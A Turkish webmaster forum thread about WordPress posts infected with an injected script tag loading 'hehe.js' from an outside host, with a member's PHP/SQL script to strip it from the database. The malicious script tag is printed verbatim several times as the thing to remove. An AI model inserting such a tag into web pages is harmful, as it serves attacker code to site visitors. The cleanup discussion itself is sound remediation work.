İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Wordpress e bulaşan hehe.js

Loi

0
İyinet Üyesi
Katılım
13 Kasım 2006
Mesajlar
6,192
Reaction score
44
Konum
localhost
Merhaba arkadaşlar,
Şuan virusun ne şekilde bulaştığını tam çözemedim. Access loglarını incelemem gerekiyor. Dedicated sunucusu olupda bu virusu yemiş biri varsa temizleme konusunda yardımcı olabilirim..


Aşağıda geçiçi çözümü şimdilik uygulayarak google filtrelerine takılmaktan kurtulabilirsiniz.

wp-virus.php adında boş bir dosya oluşturup aşağıdaki kodları yerleştirin, kayıt edip FTP adresinize gönderip dosyayı web üzerinden çalıştırın (http://www.siteadresi.com/wp-virus.php seklinde):
PHP:
<?
include("wp-config.php");

@mysql_connect(DB_HOST,DB_USER,DB_PASSWORD) or die ("Hata: veritabanına bağlanılamadı!. Bilgiler yanlış");
@mysql_select_db(DB_NAME) or die ("Hata: veritabanına bağlanılamadı!. Db yok");

$sorgu = "update wp_posts SET post_content = replace(post_content, '<script src="http://www.npu.ac.th/calendar/components/download/hehe.js"></script>', '')";
mysql_query($sorgu) or die(mysql_error());
echo "islem tamamlandı";
?>
bu dosya araciligi ile tum postlarınızın içinden
Kod:
<script src="http://www.npu.ac.th/calendar/components/download/hehe.js"></script>
kodları temizlenecektir.

Kod farklı ise, PHP dosyası üzerinde oynayabilirsiniz ancak bu işlemi yapmadan önce yedek almayı ihmal etmeyin
 

Z.YÜKSEL

0
İyinet Üyesi
Katılım
29 Ocak 2010
Mesajlar
1,489
Reaction score
18
Teşekkürler, deniyelim diyeceğim fakat bizim ki wp değil malesef fark eder mi?
 

kuaza

0
İyinet Üyesi
Katılım
4 Ağustos 2009
Mesajlar
835
Reaction score
7
wp degilse olmaz update kisminda duzenleme yapmaniz gerek, db deki sorgulama yapilacak tabloyu belirlemeniz gerek..
 

Loi

0
İyinet Üyesi
Katılım
13 Kasım 2006
Mesajlar
6,192
Reaction score
44
Konum
localhost
bana content girilen tabloyu ve sütunu verin config dosyasının şifreleri silinmiş bir halininde kopyasını verin düzenleyelim.

Virus bulasmis olan sunucu size aitse yardımcı olabilirim
 

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5

Üst